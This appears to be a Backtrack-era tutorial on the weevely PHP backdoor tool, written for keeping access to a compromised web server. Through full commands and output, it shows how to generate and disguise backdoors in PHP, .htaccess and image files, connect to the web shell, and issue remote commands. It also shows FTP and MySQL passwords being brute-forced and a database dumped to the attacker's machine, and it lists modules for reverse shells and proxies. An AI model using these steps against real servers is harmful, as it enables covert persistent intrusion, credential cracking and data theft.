Need a quick way to generate a PHP backdoor for a compromised server you want to come back to later, then weevely is your application. I was pleasantly surprised when I started playing around with weevely in more detail as it provides a ton of built in functionality and does a lot more than I initially though that weevely did. The weevely application is built using Python and its current version on Backtrack 5 R3 is weevely v0.7. The weevley.py Python script is located in the /pentest/backdoors/web/weevely directory and some of its uses are described in more detail below.
Generate weevely Backdoor Files:
There are three types of files that weevely can generate as backdoors. Likely the most success is going to be PHP as the .htaccess file type and image file type require the directory where they are located to allow htaccess override. If you are able to find a directory that will allow override then the image backdoor files are awesome because they will still display in a browser and could be harder for others to find. Below we show three examples generating one of each weevely file type backdoor which in the end all contain very similar contents but as noted previously the PHP is more hidden in the .htaccess file type and the image file type.
Generate PHP File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py generate password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [generate.php] Backdoor file 'weevely.php' created with password 'password'.
- root@bt:/pentest/backdoors/web/weevely#
You should also check out the contents of the files that are created. Also it should be noted that just because the file generated is called weevely.php doesn’t mean it cannot be renamed to something more off the radar for a PHP site such as include.php.
Generate Image File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# less generated-img/.htaccess
- AddType application/x-httpd-php .gif
- root@bt:/pentest/backdoors/web/weevely#
When an Image file type backdoor is created it requires that you place not only the image on the remote server but also the .htaccess file that is generated with it. If a .htaccess file already exists then you could simply add the contents of the generated .htaccess file to the real .htaccess file on the server. The line that would need to be added is “AddType application/x-httpd-php .gif” which would obviously change depending on the image file type itself. That line in a .htaccess file tells the web server to process .gif files like PHP files.
Generate .htaccess File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py generate.htaccess password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [generate.htaccess] Backdoor file '.htaccess' created with password 'password'.
- root@bt:/pentest/backdoors/web/weevely#
Once you have generated the file you want to place on the remote server you need to transfer the file to the server which can be done using whatever method is available to the compromised server such as SCP, FTP, TFTP, etc. Once the file exists in a directory that will be served by the remote web server you can make a connection to a weevely shell as shown in the below example. You can also issue commands remotely to the server once the weevely backdoor file is in place which is also show in an example below.In all of the examples below our target machine is located at 192.168.1.77 and our machine is located at 192.168.1.88.
Connect To Weevely Backdoor Shell On Backtrack:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/weevely.php password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [+] Starting terminal, shell probe may take a while
- [+] List modules with <tab> and show help with :show [module name]
- www-data@zotac:/var/www$
- www-data@zotac:/var/www$ :net.ifaces
- eth0: 192.168.1.77/24
- lo: 127.0.0.1/8
- www-data@zotac:/var/www$
Notice we are now connected to the remote server via the weevely backdoor. The weevely shell is pretty slick and offers lots of prebuilt modules that make gathering information super easy. Once we connected in the above example we verified we were on the remote server using the net.ifaces module available from the weevely shell. The net.ifaces module provides a clean list of active interfaces and their IP addresses on the remote server. If there was an issue connecting to the weevely shell the response from the server would look like the below example.
Failed Connection To Weevely Backdoor:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/background.php password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [+] Starting terminal, shell probe may take a while
- [!] [shell.php] PHP interpreter initialization failed
- [!] [shell.php] PHP interpreter initialization failed
- [!] No remote backdoor found. Check URL and password.
- root@bt:/pentest/backdoors/web/weevely#
If you want to send a couple commands without actually setting up an established connection with the compromised server you could do so using the syntax from the below example. Sending this type of command to the remote server to interact with the weevely backdoor allows you to issue nt only Linux commands but also the ability to use the weevely modules so in the example below you would just switch “/sbin/ifconfig eth0” with something like “:net.ifaces”. It should also be noted that to disconnect from a weevely backdoor you have to use ctrl-c.
Issue Single Command To Remote Weevely Backdoor:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/.htaccess password "/sbin/ifconfig eth0"
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- eth0 Link encap:Ethernet HWaddr 00:22:2e:40:33:b0
- inet addr:192.168.1.77 Bcast:192.168.1.255 Mask:255.255.255.0
- inet6 addr: fe80::201:2eee:fe33:1330/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:148287 errors:0 dropped:4 overruns:0 frame:0
- TX packets:11643 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:12456067 (12.4 MB) TX bytes:2208146 (2.2 MB)
- Interrupt:43 Base address:0xc000
- root@bt:/pentest/backdoors/web/weevely#
Now that you are familiar with generating the weevely backdoor files and making a basic connection to a remote weevely shell lets dig deeper into the capabilities of the weevely shell and the growing list of modules that are available. Click the title below to expand the Weevely module list including a brief description of each available module in weevely v0.7 on Backtrack Linux.
weevely Examples Using Built In Modules:
- [audit]
- [audit.user_files] Enumerate common restricted files for every system user
- Usage :audit.user_files [auto] [list] [path]
- [audit.user_web_files] First crawl web site, then enumerate files searching w/r/x permissions
- Usage :audit.user_web_files [deep]
- [audit.etc_passwd] Enumerate users in /etc/passwd content
- Usage :audit.etc_passwd [filter]
- [backdoor]
- [backdoor.tcp] Spawn shell on TCP port
- Usage :backdoor.tcp [backdoor.reverse_tcp] Send reverse TCP shell
- Usage :backdoor.reverse_tcp
- [bruteforce]
- [bruteforce.sql_users] Bruteforce SQL password of every system users using local wordlist
- Usage :bruteforce.sql_users [host]
- [bruteforce.ftp] Bruteforce single ftp user using local wordlist
- Usage :bruteforce.ftp [sline] [host] [port]
- [bruteforce.sql] Bruteforce single SQL user using local wordlist
- Usage :bruteforce.sql [sline] [host]
- [bruteforce.ftp_users] Bruteforce FTP password of every system users using a local wordlist
- Usage :bruteforce.ftp_users [host] [port]
- [file]
- [file.download] Download binary/ascii files from target
- Usage :file.download
- [file.check] Check remote files type, md5 and permission
- Usage :file.check
- [file.enum] Enumerate remote paths specified by wordlist
- Usage :file.enum [printall]
- [file.rm] Remove remote file and directory
- Usage :file.rm [recursive]
- [file.upload] Upload a file to the target filesystem
- Usage :file.upload [chunksize]
- [file.read] Read file from remote filesystem
- Usage :file.read
- [find]
- [find.suidsgid] Find files with suid and sgid flags
- Usage :find.suidsgid [type] [rpath]
- [find.perms] Find files by permissions
- Usage :find.perms [qty] [type] [perm] [rpath]
- [find.name] Find files with matching name
- Usage :find.name [match]
- [find.webdir] Find a writable directory and corresponding URL
- Usage :find.webdir [rpath]
- [generate]
- [generate.php] Generate obfuscated PHP backdoor
- Usage :generate.php [path]
- [generate.img] Backdoor existing image and create htaccess (needs remote AllowOverride)
- Usage :generate.img [outdir]
- [generate.htaccess] Create backdoor in .htaccess file (needs remote AllowOverride)
- Usage :generate.htaccess [path]
- [net]
- [net.ifaces] Print network interfaces IP/mask
- Usage :net.ifaces
- [net.php_proxy] Install PHP proxy to target
- Usage :net.php_proxy [rpath] [finddir]
- [net.proxy] Install and run real proxy through target
- Usage :net.proxy [rpath] [rurl] [finddir] [lport]
- [net.scan] Scan network for open ports
- Usage :net.scan [onlyknownports] [portsperreq]
- [shell][/shell]
- [shell language=".php"][/shell] PHP command shell
- Usage :shell.php [mode] [proxy]
- [shell language=".sh"][/shell] System shell
- Usage :shell.sh [stderr]
- [sql][/sql]
- [sql language=".console"][/sql] Start SQL console
- Usage :sql.console [host]
- [sql language=".query"][/sql] Execute SQL query
- Usage :sql.query [host]
- [sql language=".summary"][/sql] Get SQL summary of database or single tables
- Usage :sql.summary [host]
- [sql language=".dump"][/sql] Get SQL mysqldump-like database dump
- Usage :sql.dump [table] [host] [lfile]
- [system]
- [system.info] Collect system informations
- Usage :system.info [info]
Now for numerous examples that are all briefly explained by their titles. This should not be considered a complete list as weevely has lots of capabilities and I selected some of the modules that I have found useful when using the weevely.py Python script. All of the below examples assume you are connected to a weevely backdoor already.
weevely :system.info Module: Remote System Information
- www-data@zotac:/var/www$ :system.info
- whoami: www-data
- hostname: zotac
- basedir: /var/www
- uname: Linux zotac 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
- os: Linux
- document_root: /var/www
- safe_mode: 0
- script: /weevely.php
- client_ip: 192.168.1.88
- max_execution_time: 30
- php_self: /weevely.php
- www-data@zotac:/var/www$
The system.info module provides you with an overview of the remote system including the user you are connected as, the web server root directory, the hostname, the weevely backdoor script name, and more.
weevely :find.webdir Module: Locate Writeable Remote Web Server Directories
- www-data@zotac:/var/www$ :find.webdir
- [find.webdir] Writable web folder: '/var/www//weev/' -> 'http://192.168.1.77//weev/'
- True
- www-data@zotac:/var/www$
The find.webdir module will scan the remote web server directory and let you know any directories that are writeable.
weevely :bruteforce.ftp Module: Bruteforce FTP User Password
- www-data@zotac:/var/www$ :bruteforce.ftp SOMEUSER /root/wordlists/weevword
- [bruteforce.ftp] Using wordlist of 9 words
- [bruteforce.ftp] FOUND! (SOMEUSER:PASSWORD)
- www-data@zotac:/var/www$
The bruteforce.ftp weevely module will attempt to bruteforce a FTP users password. Depending on how large the wordlist is or how quickly the password is located this can take quite awhile so be patient as I am not sure if there are any status messages that are printed during the process as I set this up just as a test for this article.
weevely :bruteforce.sql Module: Bruteforce MySQL User Password
- www-data@zotac:/var/www$ :bruteforce.sql mysql root /root/wordlists/weevword
- [bruteforce.sql] Using wordlist of 999 words
- [bruteforce.sql] FOUND! (root:PASSWORD)
- www-data@zotac:/var/www$
The bruteforce.sql module available from the weevely shell will attempt to bruteforce a MySQL users password using a wordlist located on your local server. Once you have compromised a MySQL account you can then proceed to use some of the other available weevely SQL modules as shown below.
weevely :sql.query Module: Issue Single SQL Commands To MySQL
- www-data@zotac:/var/www$ :sql.query mysql root PASSWORD-HERE "show databases" localhost
- information_schema
- mysql
- snorby
- www-data@zotac:/var/www$
Using the sql.query module available in weevely we are able to issue single queries to MySQL without connecting to the weevely SQL shell which we show in the example below.
weevely :sql.console Module: Connect To weevely SQL Console On Remote Server
- ww-data@zotac:/var/www$ :sql.console mysql root PASSWORD-HERE localhost
- [sql.console] No saved state, commands like 'USE database' are ineffective. Press Ctrl-C to quit.
- root@localhost SQL> show databases;
- information_schema
- mysql
- snorby
- root@localhost SQL>
Notice how the prompt changes above after we have made a successful connection to MySQL we are now in the weevely SQL shell with direct access to the remote servers MySQL database. To get out of the weevely SQL shell use ctrl-c.
weevely :sql.dump Module: Dump MySQL Database & Save Dump Locally
- www-data@zotac:/var/www$ :sql.dump mysql root PASSWORD mysql
- [sql.dump] Saving 'root:PASSWORD@127.0.0.1-mysql' dump in 'root:PASSWORD@127.0.0.1-mysql.txt'
- www-data@zotac:/var/www$
This is one of my favorites as it makes getting a dump of the database really easy. The MySQL dump file will be located in the directory from which you launched the weevely backdoor connection from initially and it will be named with the user/pass and IP address of the MySQL server where the dump was created.
This is only some of the capabilities available with weevely but should provide a great overview for someone needing to use weevely to setup a backdoor they can access later on a compromised server.
Click here for more information about weevely or click here for other Backtrack Linux articles.